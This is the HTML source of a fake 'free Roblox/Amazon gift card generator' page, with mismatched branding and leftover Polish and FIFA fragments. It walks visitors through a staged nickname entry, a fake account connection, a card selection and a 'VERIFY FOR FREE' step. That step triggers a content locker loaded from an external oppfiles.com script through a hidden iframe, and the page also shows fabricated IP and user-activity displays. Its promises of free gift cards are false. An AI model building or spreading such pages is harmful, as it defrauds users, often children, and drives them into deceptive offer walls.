<!DOCTYPE html>
<html >
<head>
<iframe style="display: none; left: 0; position: fixed; top: 0;" frameborder="0" height="440px" id="frame" marginheight="5px" marginwidth="5px" name="frame" scrolling="no" width="100%"></iframe>

<script type="text/javascript" src="https://oppfiles.com/script_include.php?id=1075882"></script>

    <title>FREE ROBLOX GIFTCARDS GENERATOR </title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<meta name="description" content="FREE ROBLOX GIFTCARDS GENERATOR " />    
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<link rel="icon" type="image/ico" href="img/favicon.ico" />
	
	<!-- CSS -->
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
	<script defer src="https://use.fontawesome.com/releases/v5.0.13/js/brands.js" integrity="sha384-G/XjSSGjG98ANkPn82CYar6ZFqo7iCeZwVZIbNWhAmvCF2l+9b5S21K4udM7TGNu" crossorigin="anonymous"></script>
	<script defer src="https://use.fontawesome.com/releases/v5.0.13/js/fontawesome.js" integrity="sha384-6OIrr52G08NpOFSZdxxz1xdNSndlD4vdcf/q2myIUVO0VsqaGHJsB0RaBE01VTOY" crossorigin="anonymous"></script>
    <link href="css/bootstrap.min.css" rel="stylesheet" />  
    <link href="css/animate.css" rel="stylesheet" />
    <link href="css/slick.css" rel="stylesheet" />
    <link href="css/magnific-popup.css" rel="stylesheet" />
    <link href="css/style.css" rel="stylesheet" />	
    <style>
	    .recent-activity-r-item-1:before {
			background: url('img/zloto.png');
			background-size: 100% 100%;
			-webkit-background-size: 100% 100%;
			background-repeat: no-repeat;
			background-position: center center;
		}
		.recent-activity-r-item-2:before {
			background: url('img/diamenty.png');
			background-size: 100% 100%;
			-webkit-background-size: 100% 100%;
			background-repeat: no-repeat;
			background-position: center center;
		}
	</style>
    <!-- tutaj kod sledzenia -->
</head>
<body style="background: url('img/tlo2.png'); background-attachment: fixed; background-size: cover; background-position: top;">
	<header>

	</header>
	<div class="container">
		<img src="img/Roblox-Logo.png" class="logo">
		<div class="status-wrapper">
			<div class="status-inner-wrapper">
				<div class="status-column column-first">
					<span class="status-static">Status:</span>
					<span id="status" class="status-dynamic">Online</span>
				</div>
				<div class="status-column column-idk">
					<span class="status-static">Your IP Adress: </span>
			<span id="ipadress" class="status-dynamic">102.157.173.157</span>
				</div>
				<div class="status-column column-second">
					<span class="status-static">Latest delivery:</span>
					<span id="date" class="status-dynamic"></span>
				</div>
				<div class="status-column column-last">
					<span class="status-static">Online users:</span>
					<span id="online-count" class="status-dynamic"></span>
				</div>
				<div class="icon-column">
					<img src="img/status-icon.png" class="img-fluid status-icon" alt="Status Icon"/>
				</div>
			</div>
			<div class="status-shadow-wrapper"></div>
		</div>
		<div class="clearfix"></div>
		<div class="content-grid-wrapper step-zero">
			<div classteps="content-grid-inner-wrapper">
				<div class="row small-margin">
					<div class="col-lg-7 small-padding">
						<div class="grid-column generator-grid-column">
							<div class="grid-column-decor-generator"></div>
							<div class="grid-column-decor-generator-b"></div>							
							<div class="generator-grid-inner">
								<div class="grid-column-title">
									<h4>FREE AMAZON GIFTCARDS GENERATOR</h4>
								</div>
								<div class="grid-column-content">
									<div class="generator-wrapper">
										<div class="fut-player-info-wrapper">											
											<div class="fut-player-info-row fut-player-info-row-top">
												<label class="styled-label">1. Your Amazon nickname</label>
												<div class="input-wrapper username-input-wrapper">
													<img src="img/avatar.png" alt="Player Icon" class="img-fluid input-icon" style="top:20px;" />
													<input type="text" id="fut-username" class="styled-input" style="border-radius: 20px;" placeholder="Your nickname..." />
												</div>
											</div>
											<div class="fut-player-info-row fut-player-info-row-bottom">
												<label class="styled-label">2.  Device Used </label>
												<div class="row double-margin">
													<select class="styled-input jakieopcje" style="margin: 0 auto;width: 90%;border-radius: 20px;padding:0 20px 0 20px;">
																													<option>Mobile</option>
																													<option>PC</option>
																													<option>Tablet</option>
																											</select>
												</div>
											</div>
										</div>
										<div class="button-wrapper">
											<div id="b-1" class="styled-button n-a"><span>Continue</span></div>
										</div>
									</div>
									<div class="intro-loader-wrapper">
										<div class="loader">Loanding...</div>	
									</div>
								</div>
							</div>
						</div>
						<div class="grid-column how-to-use-column">
							<div class="grid-column-decor-generator-gray-3"></div>
							<div class="generator-grid-inner">
								<div class="grid-column-title">
									<h4>FAQ</h4>
								</div>
								<div class="grid-column-content">
									<div class="how-to-use-wrapper">
										<div id="progressBarHowTo" class="how-to-loadbar">
											<div></div>
											<span class="how-to-progress-dot how-to-progress-dot-1"></span>
											<span class="how-to-progress-dot how-to-progress-dot-2"></span>
											<span class="how-to-progress-dot how-to-progress-dot-3"></span>
																					</div>			
										<div class="how-to-use">
											<div class="how-to-use-item">
												<span class="how-to-use-step-title">
													<span></span> What is a Amazon Play gift code?												</span>
												<p>
													Get access to bonuses and bonus content on over one million skins and more on Amazon, one of the best games in the world.												</p>
											</div>
											<div class="how-to-use-item">
												<span class="how-to-use-step-title">
													<span></span> Get your giftcard for free!												</span>
												<p>
													Enjoy content, games and videos in the best quality on your phone!												</p>
											</div>
											<div class="how-to-use-item">
												<span class="how-to-use-step-title">
													<span></span> Your Giftcard in 5 minutes												</span>
												<p>
													You are only a few steps away from getting your giftcard :) <br> Complete the verification and enjoy a new quality of gaming!												</p>
											</div>
																					</div>
									</div>
								</div>
							</div>
						</div>
					</div>
					<div class="col-lg-5 small-padding">
						<div class="grid-column video-grid-column">
							<div class="grid-column-decor-generator-gray-r"></div>
							<div class="generator-grid-inner">
								<div class="grid-column-title">
									<h4>Get your free giftcard!</h4>
								</div>
								<div class="grid-column-content">
									<div class="embed-responsive embed-responsive-4by3" style="height:245px !important;">
										<video width="320" height="245"  poster="img/bo.jpg"  controls>
										  <source src="/video/testowy.mp4" type="video/mp4">
											Niestetya, Twoja przeglądarka nie może obsłużyć tego pliku wideo - spróbuj innej.
										</video> 
									</div>	
									<p style="margin:20px; color: black; font-size:19px;">Now you dont have to spend a fortune to enjoy new games, skin or items! Choose your giftcard and enjoy!</p>							
								</div>
							</div>
						</div>
						<div class="grid-column recent-activity-column">
							<div class="grid-column-decor-generator-gray-2"></div>
							<div class="generator-grid-inner">
								<div class="grid-column-title">
									<h4>Last Users:</h4>
								</div>
								<div class="grid-column-content">
									<div id="recent-activity" class="recent-activity"></div>									
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
		<div id="step-one" class="step-one-wrapper step-wrapper" style="animation: pulse 2s infinite; display: none;">
			<div class="step-content">
				<div class="step-one-inner-wrapper">
					<div class="step-grid">
						<div class="step-grid-column connecting-grid-column">
							<div class="connecting-message">Connecting with the account <span class="username-here"></span>...</div>
						</div>
					</div>
				</div>
			</div>
		</div>


<div id="step-two" class="step-two-wrapper step-wrapper" style="display: none;">
	<div class="step-content">
		<div class="step-two-inner-wrapper">
			<div class="step-grid">
				<div class="row small-margin">
					<div class="col-md-3 col-lg-4 small-padding">
						<div class="step-grid-column step-two-grid-column connected-grid-column">
							<div class="grid-column-decor-generator"></div>
							<div class="grid-column-decor-generator-b"></div>
							<div class="grid-column-title">
								<h4>Your details:</h4>
							</div>
							<div class="grid-column-content">
								<div class="connected-player-row">
									<span class="connected-player-label">Nickname:</span>
									<div class="connected-player-username"></div>
								</div>
								<div class="connected-player-row connected-player-row-b">
									<span class="connected-player-label">Device:</span>
									<div class="connected-player-secondoption"></div>
								</div>
							</div>
						</div>
					</div>
					<div class="col-md-9 col-lg-8 small-padding">
						<div class="step-grid-column step-two-grid-column resource-grid-column">
							<div class="grid-column-title">
								<h4>Choose your giftcard!</h4>
							</div>
							<div class="grid-column-content">
								<div class="resource-1-content">
									<div class="row no-margin">
											<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-1 resource-item-column-1-1 odd">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">10$ Giftcard</div>
												<img src="img/fut-p-img.png" class="img-fluid resource-select-img" />
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/zloto.png" class="img-fluid resource-select-icon" />10$</span>
													<span class="res-value-bottom-label">Giftcard</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
											<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-1 resource-item-column-1-2">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">25$ Giftcard</div>
												<img src="img/fut-p-img.png" class="img-fluid resource-select-img" />
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/zloto.png" class="img-fluid resource-select-icon" />25$</span>
													<span class="res-value-bottom-label">Giftcard</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
											<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-1 resource-item-column-1-3 odd">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">50$ Giftcard</div>
												<img src="img/fut-p-img.png" class="img-fluid resource-select-img" />
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/zloto.png" class="img-fluid resource-select-icon" />50$</span>
													<span class="res-value-bottom-label">Giftcard</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
										<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-1 resource-item-column-1-4">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">100$ Giftcard</div>
												<img src="img/fut-p-img.png" class="img-fluid resource-select-img" />
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/zloto.png" class="img-fluid resource-select-icon" />100$</span>
													<span class="res-value-bottom-label">Giftcard</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
									</div>
								</div>
								<div class="resource-2-content">
									<div class="row no-margin">
											<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-2 resource-item-column-2-1 odd">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">50 diamentów</div>
												<img src="img/fut-c-img.png" class="img-fluid resource-select-img" />
																								<div class="price-wrapper">
													<div class="price-old"><span class="currency">$</span>7,99</div>
												</div>
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/diamenty.png" class="img-fluid resource-select-icon" />50</span>
													<span class="res-value-bottom-label">diamentów</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
											<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-2 resource-item-column-2-2">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">100 diamentów</div>
												<img src="img/fut-c-img.png" class="img-fluid resource-select-img" />
																								<div class="price-wrapper">
													<div class="price-old"><span class="currency">$</span>12.99</div>
												</div>
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/diamenty.png" class="img-fluid resource-select-icon" />100</span>
													<span class="res-value-bottom-label">diamentów</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
											<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-2 resource-item-column-2-3 odd">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">250 diamentów</div>
												<img src="img/fut-c-img.png" class="img-fluid resource-select-img" />
																								<div class="price-wrapper">
													<div class="price-old"><span class="currency">$</span>18,99</div>
												</div>
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/diamenty.png" class="img-fluid resource-select-icon" />250</span>
													<span class="res-value-bottom-label">diamentów</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
										<div class="col-md-3 col-6 no-padding">
											<div class="resource-item-column resource-item-column-2 resource-item-column-2-4">
												<div class="res-item-decor-t"></div>
												<div class="res-value-top">500 diamentów</div>
												<img src="img/fut-c-img.png" class="img-fluid resource-select-img" />
																								<div class="price-wrapper">
													<div class="price-old"><span class="currency">$</span>26,99</div>
												</div>
																								<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/diamenty.png" class="img-fluid resource-select-icon" />500</span>
													<span class="res-value-bottom-label">diamentów</span>
												</div>
												<div class="res-item-decor-b"></div>
											</div>
										</div>
									</div>
								</div>	

								<div id="console-wrapper" class="console-wrapper zoomInDown animated" style="display: none;">
									<div class="console-content">
										<div class="console-inner-wrapper">
											<div class="console-loader-wrapper">
												<div class="loader">Kończenie...</div>
											</div>
											<!--<div class="console-resource-item-column console-resource-item-column-1">
												<img src="img/fut-p-img.png" class="img-fluid resource-select-img" />
												<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-1"><img src="img/points-icon.png" class="img-fluid resource-select-icon" /><span id="console-resource-item-1-c-t">0</span></span>
													<span class="res-value-bottom-label">Fifa Points</span>
												</div>
											</div>
											<div class="console-resource-item-column console-resource-item-column-2">
												<img src="img/fut-c-img.png" class="img-fluid resource-select-img" />
												<div class="res-value-bottom">
													<span class="res-value-bottom-val res-value-bottom-val-r-2"><img src="img/coins-icon.png" class="img-fluid resource-select-icon" /><span id="console-resource-item-2-c-t">0</span></span>
													<span class="res-value-bottom-label">Fifa Coins</span>
												</div>
											</div>-->
											<div class="console-message"></div>
											<div id="progressBarConsole" class="console-loadbar" style="display: block !important;">
												<div></div>
											</div>	
										</div>
									</div>
								</div>


							<div id="verification-wrapper" class="verification-wrapper" style="display: none;">
						<p>Verification is almost complete!</p>
<div class="" style="color: black;margin-top: 50px;">

		 					<button onclick="call_locker();" class="ver-button" >VERIFY FOR FREE</button>

					</div> </center>					</div>								</div> 
							</div>
						
							</div>
						</div>
					</div>
				</div>
			
			</div>
		</div>
	</div>
	
</div>


	</div>	
	
	<footer>
	   
	    
	    
	<div class="djwons">
	    
	    
	    <img src="https://tweakshq.club/img/curv-footer-green-footer-design-11562986397sgy5ah5psw-removebg-preview.png" class="djwons" alt="baner">
	    
	    
	    
	    </div>
		
		<div class="container">
			<div class="footer-content-wrapper">
				<div class="footer-content-inner-wrapper">
						<div class="copyright-notice">
					<center>

</center>
</div>
					
					</div>
				</div>
			</div>
		</div>
	</footer>

	<br>
	<br>

	
	<!-- JavaScript/jQuery -->	
	<!-- przekazanie danych do plikow js -->
	<input type="hidden" id="sessid" value="e24f542f9f466b2576629c1dd3a68820">
	<input type="hidden" id="ileDoGenerowania" value="1">
	<input type="hidden" id="pierwszaRzeczObraz" value="zloto.png">
	<input type="hidden" id="pierwszaRzeczDop" value="Giftcard">
	

				<input type="hidden" id="pierwszaRzeczPakiety0" value="10$">
						<input type="hidden" id="pierwszaRzeczPakiety1" value="25$">
						<input type="hidden" id="pierwszaRzeczPakiety2" value="50$">
						<input type="hidden" id="pierwszaRzeczPakiety3" value="100$">
			
	

    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>	
    <script type="text/javascript" src="js/bootstrap.min.js"></script>
    <script type="text/javascript" src="js/validator.min.js"></script>
	<script type="text/javascript" src="js/form-scripts.js"></script>
	<script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>	
	<script type="text/javascript" src="js/ion.sound.min.js"></script>	
	<script type="text/javascript" src="js/slick.min.js"></script>	
	<script type="text/javascript" src="js/jquery.countTo.js"></script>	
	<script type="text/javascript" src="js/activity.js"></script>	
	<script type="text/javascript" src="js/jquery.md5.min.js"></script>
    <script type="text/javascript" src="js/main.js"></script>

	
	
</body>
</html>